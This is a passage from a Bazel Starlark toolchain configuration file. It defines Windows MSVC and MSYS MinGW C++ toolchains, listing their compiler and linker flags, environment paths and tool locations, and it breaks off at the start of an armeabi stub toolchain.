ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
]
def _windows_msvc_impl(ctx):
toolchain_identifier = "msvc_x64"
host_system_name = "local"
target_system_name = "local"
target_cpu = "x64_windows"
target_libc = "msvcrt"
compiler = "msvc-cl"
abi_version = "local"
abi_libc_version = "local"
cc_target_os = None
builtin_sysroot = None
cxx_builtin_include_directories = [
# This is a workaround for https://github.com/bazelbuild/bazel/issues/5087.
"C:\\botcode\\w",
"c:/tools/msys64/usr/",
"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE",
"C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt",
]
cpp_link_nodeps_dynamic_library_action = action_config(
action_name = ACTION_NAMES.cpp_link_nodeps_dynamic_library,
implies = [
"nologo",
"shared_flag",
"linkstamps",
"output_execpath_flags",
"input_param_flags",
"user_link_flags",
"default_link_flags",
"linker_subsystem_flag",
"linker_param_file",
"msvc_env",
"no_stripping",
"has_configured_linker_path",
"def_file",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe")],
)
cpp_link_static_library_action = action_config(
action_name = ACTION_NAMES.cpp_link_static_library,
implies = [
"nologo",
"archiver_flags",
"input_param_flags",
"linker_param_file",
"msvc_env",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/lib.exe")],
)
assemble_action = action_config(
action_name = ACTION_NAMES.assemble,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"nologo",
"msvc_env",
"sysroot",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/ml64.exe")],
)
preprocess_assemble_action = action_config(
action_name = ACTION_NAMES.preprocess_assemble,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"nologo",
"msvc_env",
"sysroot",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/ml64.exe")],
)
c_compile_action = action_config(
action_name = ACTION_NAMES.c_compile,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"default_compile_flags",
"nologo",
"msvc_env",
"parse_showincludes",
"user_compile_flags",
"sysroot",
"unfiltered_compile_flags",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe")],
)
cpp_compile_action = action_config(
action_name = ACTION_NAMES.cpp_compile,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"default_compile_flags",
"nologo",
"msvc_env",
"parse_showincludes",
"user_compile_flags",
"sysroot",
"unfiltered_compile_flags",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe")],
)
cpp_link_executable_action = action_config(
action_name = ACTION_NAMES.cpp_link_executable,
implies = [
"nologo",
"linkstamps",
"output_execpath_flags",
"input_param_flags",
"user_link_flags",
"default_link_flags",
"linker_subsystem_flag",
"linker_param_file",
"msvc_env",
"no_stripping",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe")],
)
cpp_link_dynamic_library_action = action_config(
action_name = ACTION_NAMES.cpp_link_dynamic_library,
implies = [
"nologo",
"shared_flag",
"linkstamps",
"output_execpath_flags",
"input_param_flags",
"user_link_flags",
"default_link_flags",
"linker_subsystem_flag",
"linker_param_file",
"msvc_env",
"no_stripping",
"has_configured_linker_path",
"def_file",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe")],
)
action_configs = [
assemble_action,
preprocess_assemble_action,
c_compile_action,
cpp_compile_action,
cpp_link_executable_action,
cpp_link_dynamic_library_action,
cpp_link_nodeps_dynamic_library_action,
cpp_link_static_library_action,
]
msvc_link_env_feature = feature(
name = "msvc_link_env",
env_sets = [
env_set(
actions = all_link_actions +
[ACTION_NAMES.cpp_link_static_library],
env_entries = [env_entry(key = "LIB", value = "C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\LIB\\amd64;C:\\Program Files (x86)\\Windows Kits\\10\\lib\\10.0.10240.0\\ucrt\\x64;C:\\Program Files (x86)\\Windows Kits\\8.1\\lib\\winv6.3\\um\\x64;")],
),
],
)
shared_flag_feature = feature(
name = "shared_flag",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [flag_group(flags = ["/DLL"])],
),
],
)
determinism_feature = feature(
name = "determinism",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [
flag_group(
flags = [
"/wd4117",
"-D__DATE__=\"redacted\"",
"-D__TIMESTAMP__=\"redacted\"",
"-D__TIME__=\"redacted\"",
],
),
],
),
],
)
sysroot_feature = feature(
name = "sysroot",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [
flag_group(
flags = ["--sysroot=%{sysroot}"],
iterate_over = "sysroot",
expand_if_available = "sysroot",
),
],
),
],
)
unfiltered_compile_flags_feature = feature(
name = "unfiltered_compile_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flags = ["%{unfiltered_compile_flags}"],
iterate_over = "unfiltered_compile_flags",
expand_if_available = "unfiltered_compile_flags",
),
],
),
],
)
copy_dynamic_libraries_to_binary_feature = feature(name = "copy_dynamic_libraries_to_binary")
input_param_flags_feature = feature(
name = "input_param_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
],
flag_groups = [
flag_group(
flags = ["/IMPLIB:%{interface_library_output_path}"],
expand_if_available = "interface_library_output_path",
),
],
),
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["%{libopts}"],
iterate_over = "libopts",
expand_if_available = "libopts",
),
],
),
flag_set(
actions = all_link_actions +
[ACTION_NAMES.cpp_link_static_library],
flag_groups = [
flag_group(
iterate_over = "libraries_to_link",
flag_groups = [
flag_group(
iterate_over = "libraries_to_link.object_files",
flag_groups = [flag_group(flags = ["%{libraries_to_link.object_files}"])],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "object_file_group",
),
),
flag_group(
flag_groups = [flag_group(flags = ["%{libraries_to_link.name}"])],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "object_file",
),
),
flag_group(
flag_groups = [flag_group(flags = ["%{libraries_to_link.name}"])],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "interface_library",
),
),
flag_group(
flag_groups = [
flag_group(
flags = ["%{libraries_to_link.name}"],
expand_if_false = "libraries_to_link.is_whole_archive",
),
flag_group(
flags = ["/WHOLEARCHIVE:%{libraries_to_link.name}"],
expand_if_true = "libraries_to_link.is_whole_archive",
),
],
expand_if_equal = variable_with_value(
name = "libraries_to_link.type",
value = "static_library",
),
),
],
expand_if_available = "libraries_to_link",
),
],
),
],
)
fastbuild_feature = feature(
name = "fastbuild",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Od", "/Z7"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/DEBUG:FASTLINK", "/INCREMENTAL:NO"],
),
],
),
],
implies = ["generate_pdb_file"],
)
user_compile_flags_feature = feature(
name = "user_compile_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flags = ["%{user_compile_flags}"],
iterate_over = "user_compile_flags",
expand_if_available = "user_compile_flags",
),
],
),
],
)
archiver_flags_feature = feature(
name = "archiver_flags",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.cpp_link_static_library],
flag_groups = [
flag_group(
flags = ["/OUT:%{output_execpath}"],
expand_if_available = "output_execpath",
),
],
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/MACHINE:X64"])],
),
],
)
static_link_msvcrt_feature = feature(name = "static_link_msvcrt")
dynamic_link_msvcrt_debug_feature = feature(
name = "dynamic_link_msvcrt_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MDd"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:msvcrtd.lib"])],
),
],
requires = [feature_set(features = ["dbg"])],
)
dbg_feature = feature(
name = "dbg",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Od", "/Z7"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/DEBUG:FULL", "/INCREMENTAL:NO"],
),
],
),
],
implies = ["generate_pdb_file"],
)
opt_feature = feature(
name = "opt",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/O2"])],
),
],
implies = ["frame_pointer"],
)
supports_interface_shared_libraries_feature = feature(
name = "supports_interface_shared_libraries",
enabled = True,
)
user_link_flags_feature = feature(
name = "user_link_flags",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["%{user_link_flags}"],
iterate_over = "user_link_flags",
expand_if_available = "user_link_flags",
),
],
),
],
)
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = [
flag_group(
flags = [
"/DCOMPILER_MSVC",
"/DNOMINMAX",
"/D_WIN32_WINNT=0x0601",
"/D_CRT_SECURE_NO_DEPRECATE",
"/D_CRT_SECURE_NO_WARNINGS",
"/bigobj",
"/Zm500",
"/EHsc",
"/wd4351",
"/wd4291",
"/wd4250",
"/wd4996",
],
),
],
),
],
)
msvc_compile_env_feature = feature(
name = "msvc_compile_env",
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
],
env_entries = [env_entry(key = "INCLUDE", value = "C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE;C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt;C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared;C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um;C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt;")],
),
],
)
preprocessor_defines_feature = feature(
name = "preprocessor_defines",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
],
flag_groups = [
flag_group(
flags = ["/D%{preprocessor_defines}"],
iterate_over = "preprocessor_defines",
),
],
),
],
)
generate_pdb_file_feature = feature(
name = "generate_pdb_file",
requires = [
feature_set(features = ["dbg"]),
feature_set(features = ["fastbuild"]),
],
)
output_execpath_flags_feature = feature(
name = "output_execpath_flags",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/OUT:%{output_execpath}"],
expand_if_available = "output_execpath",
),
],
),
],
)
dynamic_link_msvcrt_no_debug_feature = feature(
name = "dynamic_link_msvcrt_no_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MD"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:msvcrt.lib"])],
),
],
requires = [
feature_set(features = ["fastbuild"]),
feature_set(features = ["opt"]),
],
)
disable_assertions_feature = feature(
name = "disable_assertions",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/DNDEBUG"])],
with_features = [with_feature_set(features = ["opt"])],
),
],
)
has_configured_linker_path_feature = feature(name = "has_configured_linker_path")
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
no_stripping_feature = feature(name = "no_stripping")
linker_param_file_feature = feature(
name = "linker_param_file",
flag_sets = [
flag_set(
actions = all_link_actions +
[ACTION_NAMES.cpp_link_static_library],
flag_groups = [
flag_group(
flags = ["@%{linker_param_file}"],
expand_if_available = "linker_param_file",
),
],
),
],
)
ignore_noisy_warnings_feature = feature(
name = "ignore_noisy_warnings",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.cpp_link_static_library],
flag_groups = [flag_group(flags = ["/ignore:4221"])],
),
],
)
no_legacy_features_feature = feature(name = "no_legacy_features")
parse_showincludes_feature = feature(
name = "parse_showincludes",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_header_parsing,
],
flag_groups = [flag_group(flags = ["/showIncludes"])],
),
],
)
static_link_msvcrt_no_debug_feature = feature(
name = "static_link_msvcrt_no_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MT"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:libcmt.lib"])],
),
],
requires = [
feature_set(features = ["fastbuild"]),
feature_set(features = ["opt"]),
],
)
treat_warnings_as_errors_feature = feature(
name = "treat_warnings_as_errors",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/WX"])],
),
],
)
windows_export_all_symbols_feature = feature(name = "windows_export_all_symbols")
no_windows_export_all_symbols_feature = feature(name = "no_windows_export_all_symbols")
include_paths_feature = feature(
name = "include_paths",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
],
flag_groups = [
flag_group(
flags = ["/I%{quote_include_paths}"],
iterate_over = "quote_include_paths",
),
flag_group(
flags = ["/I%{include_paths}"],
iterate_over = "include_paths",
),
flag_group(
flags = ["/I%{system_include_paths}"],
iterate_over = "system_include_paths",
),
],
),
],
)
linkstamps_feature = feature(
name = "linkstamps",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["%{linkstamp_paths}"],
iterate_over = "linkstamp_paths",
expand_if_available = "linkstamp_paths",
),
],
),
],
)
targets_windows_feature = feature(
name = "targets_windows",
enabled = True,
implies = ["copy_dynamic_libraries_to_binary"],
)
linker_subsystem_flag_feature = feature(
name = "linker_subsystem_flag",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/SUBSYSTEM:CONSOLE"])],
),
],
)
static_link_msvcrt_debug_feature = feature(
name = "static_link_msvcrt_debug",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/MTd"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/DEFAULTLIB:libcmtd.lib"])],
),
],
requires = [feature_set(features = ["dbg"])],
)
frame_pointer_feature = feature(
name = "frame_pointer",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Oy-"])],
),
],
)
compiler_output_flags_feature = feature(
name = "compiler_output_flags",
flag_sets = [
flag_set(
actions = [ACTION_NAMES.assemble],
flag_groups = [
flag_group(
flag_groups = [
flag_group(
flags = ["/Fo%{output_file}", "/Zi"],
expand_if_available = "output_file",
expand_if_not_available = "output_assembly_file",
),
],
expand_if_not_available = "output_preprocess_file",
),
],
),
flag_set(
actions = [
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flag_groups = [
flag_group(
flags = ["/Fo%{output_file}"],
expand_if_not_available = "output_preprocess_file",
),
],
expand_if_available = "output_file",
expand_if_not_available = "output_assembly_file",
),
flag_group(
flag_groups = [
flag_group(
flags = ["/Fa%{output_file}"],
expand_if_available = "output_assembly_file",
),
],
expand_if_available = "output_file",
),
flag_group(
flag_groups = [
flag_group(
flags = ["/P", "/Fi%{output_file}"],
expand_if_available = "output_preprocess_file",
),
],
expand_if_available = "output_file",
),
],
),
],
)
nologo_feature = feature(
name = "nologo",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
flag_groups = [flag_group(flags = ["/nologo"])],
),
],
)
smaller_binary_feature = feature(
name = "smaller_binary",
enabled = True,
flag_sets = [
flag_set(
actions = [ACTION_NAMES.c_compile, ACTION_NAMES.cpp_compile],
flag_groups = [flag_group(flags = ["/Gy", "/Gw"])],
with_features = [with_feature_set(features = ["opt"])],
),
flag_set(
actions = all_link_actions,
flag_groups = [flag_group(flags = ["/OPT:ICF", "/OPT:REF"])],
with_features = [with_feature_set(features = ["opt"])],
),
],
)
compiler_input_flags_feature = feature(
name = "compiler_input_flags",
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
],
flag_groups = [
flag_group(
flags = ["/c", "%{source_file}"],
expand_if_available = "source_file",
),
],
),
],
)
def_file_feature = feature(
name = "def_file",
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = [
flag_group(
flags = ["/DEF:%{def_file_path}", "/ignore:4070"],
expand_if_available = "def_file_path",
),
],
),
],
)
msvc_env_feature = feature(
name = "msvc_env",
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
env_entries = [
env_entry(key = "PATH", value = "C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\BIN\\amd64;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319;C:\\Windows\\Microsoft.NET\\Framework64\\;C:\\Program Files (x86)\\Windows Kits\\8.1\\bin\\x64;C:\\Program Files (x86)\\Windows Kits\\8.1\\bin\\x86;;C:\\Windows\\system32"),
env_entry(key = "TMP", value = "C:\\Users\\ContainerAdministrator\\AppData\\Local\\Temp"),
env_entry(key = "TEMP", value = "C:\\Users\\ContainerAdministrator\\AppData\\Local\\Temp"),
],
),
],
implies = ["msvc_compile_env", "msvc_link_env"],
)
features = [
no_legacy_features_feature,
nologo_feature,
has_configured_linker_path_feature,
no_stripping_feature,
targets_windows_feature,
copy_dynamic_libraries_to_binary_feature,
default_compile_flags_feature,
msvc_env_feature,
msvc_compile_env_feature,
msvc_link_env_feature,
include_paths_feature,
preprocessor_defines_feature,
parse_showincludes_feature,
generate_pdb_file_feature,
shared_flag_feature,
linkstamps_feature,
output_execpath_flags_feature,
archiver_flags_feature,
input_param_flags_feature,
linker_subsystem_flag_feature,
user_link_flags_feature,
default_link_flags_feature,
linker_param_file_feature,
static_link_msvcrt_feature,
static_link_msvcrt_no_debug_feature,
dynamic_link_msvcrt_no_debug_feature,
static_link_msvcrt_debug_feature,
dynamic_link_msvcrt_debug_feature,
dbg_feature,
fastbuild_feature,
opt_feature,
frame_pointer_feature,
disable_assertions_feature,
determinism_feature,
treat_warnings_as_errors_feature,
smaller_binary_feature,
ignore_noisy_warnings_feature,
user_compile_flags_feature,
sysroot_feature,
unfiltered_compile_flags_feature,
compiler_output_flags_feature,
compiler_input_flags_feature,
def_file_feature,
windows_export_all_symbols_feature,
no_windows_export_all_symbols_feature,
supports_dynamic_linker_feature,
supports_interface_shared_libraries_feature,
]
artifact_name_patterns = [
artifact_name_pattern(
category_name = "object_file",
prefix = "",
extension = ".obj",
),
artifact_name_pattern(
category_name = "static_library",
prefix = "",
extension = ".lib",
),
artifact_name_pattern(
category_name = "alwayslink_static_library",
prefix = "",
extension = ".lo.lib",
),
artifact_name_pattern(
category_name = "executable",
prefix = "",
extension = ".exe",
),
artifact_name_pattern(
category_name = "dynamic_library",
prefix = "",
extension = ".dll",
),
artifact_name_pattern(
category_name = "interface_library",
prefix = "",
extension = ".if.lib",
),
]
make_variables = []
tool_paths = [
tool_path(name = "ar", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/lib.exe"),
tool_path(name = "ml", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/ml64.exe"),
tool_path(name = "cpp", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe"),
tool_path(name = "gcc", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe"),
tool_path(name = "gcov", path = "wrapper/bin/msvc_nop.bat"),
tool_path(name = "ld", path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe"),
tool_path(name = "nm", path = "wrapper/bin/msvc_nop.bat"),
tool_path(
name = "objcopy",
path = "wrapper/bin/msvc_nop.bat",
),
tool_path(
name = "objdump",
path = "wrapper/bin/msvc_nop.bat",
),
tool_path(
name = "strip",
path = "wrapper/bin/msvc_nop.bat",
),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
cc_target_os = None,
)
def _windows_msys_mingw_impl(ctx):
toolchain_identifier = "msys_x64_mingw"
host_system_name = "local"
target_system_name = "local"
target_cpu = "x64_windows"
target_libc = "mingw"
compiler = "mingw-gcc"
abi_version = "local"
abi_libc_version = "local"
cc_target_os = None
builtin_sysroot = None
action_configs = []
targets_windows_feature = feature(
name = "targets_windows",
implies = ["copy_dynamic_libraries_to_binary"],
enabled = True,
)
copy_dynamic_libraries_to_binary_feature = feature(name = "copy_dynamic_libraries_to_binary")
gcc_env_feature = feature(
name = "gcc_env",
enabled = True,
env_sets = [
env_set(
actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
ACTION_NAMES.cpp_link_static_library,
],
env_entries = [
env_entry(key = "PATH", value = "c:/tools/msys64/mingw64/bin"),
],
),
],
)
msys_mingw_flags = [
"-std=gnu++0x",
]
msys_mingw_link_flags = [
"-lstdc++",
]
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
),
flag_set(
actions = [
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = msys_mingw_flags)] if msys_mingw_flags else []),
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = msys_mingw_link_flags)] if msys_mingw_link_flags else []),
),
],
)
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
features = [
targets_windows_feature,
copy_dynamic_libraries_to_binary_feature,
gcc_env_feature,
default_compile_flags_feature,
default_link_flags_feature,
supports_dynamic_linker_feature,
]
cxx_builtin_include_directories = [
# This is a workaround for https://github.com/bazelbuild/bazel/issues/5087.
"C:\\botcode\\w",
"c:/tools/msys64/mingw64/",
"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE",
"C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt",
]
artifact_name_patterns = [
artifact_name_pattern(
category_name = "executable",
prefix = "",
extension = ".exe",
),
]
make_variables = []
tool_paths = [
tool_path(name = "ar", path = "c:/tools/msys64/mingw64/bin/ar"),
tool_path(name = "compat-ld", path = "c:/tools/msys64/mingw64/bin/ld"),
tool_path(name = "cpp", path = "c:/tools/msys64/mingw64/bin/cpp"),
tool_path(name = "dwp", path = "c:/tools/msys64/mingw64/bin/dwp"),
tool_path(name = "gcc", path = "c:/tools/msys64/mingw64/bin/gcc"),
tool_path(name = "gcov", path = "c:/tools/msys64/mingw64/bin/gcov"),
tool_path(name = "ld", path = "c:/tools/msys64/mingw64/bin/ld"),
tool_path(name = "nm", path = "c:/tools/msys64/mingw64/bin/nm"),
tool_path(name = "objcopy", path = "c:/tools/msys64/mingw64/bin/objcopy"),
tool_path(name = "objdump", path = "c:/tools/msys64/mingw64/bin/objdump"),
tool_path(name = "strip", path = "c:/tools/msys64/mingw64/bin/strip"),
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
features = features,
action_configs = action_configs,
artifact_name_patterns = artifact_name_patterns,
cxx_builtin_include_directories = cxx_builtin_include_directories,
toolchain_identifier = toolchain_identifier,
host_system_name = host_system_name,
target_system_name = target_system_name,
target_cpu = target_cpu,
target_libc = target_libc,
compiler = compiler,
abi_version = abi_version,
abi_libc_version = abi_libc_version,
tool_paths = tool_paths,
make_variables = make_variables,
builtin_sysroot = builtin_sysroot,
cc_target_os = cc_target_os,
)
def _armeabi_impl(ctx):
toolchain_identifier = "stub_armeabi-v7a"
host_system_name = "armeabi-v7a"
target_system_name = "armeabi-v7a"
target_cpu = "armeabi-v7a"
target_libc = "armeabi-v7a"
compiler = "compiler"
abi_version = "armeabi-v7a"
abi_libc_version = "armeabi-v7a"
cc_target_os = None
builtin_sysroot = None
action_configs = []
supports_pic_feature = feature(name = "supports_pic", enabled = True)
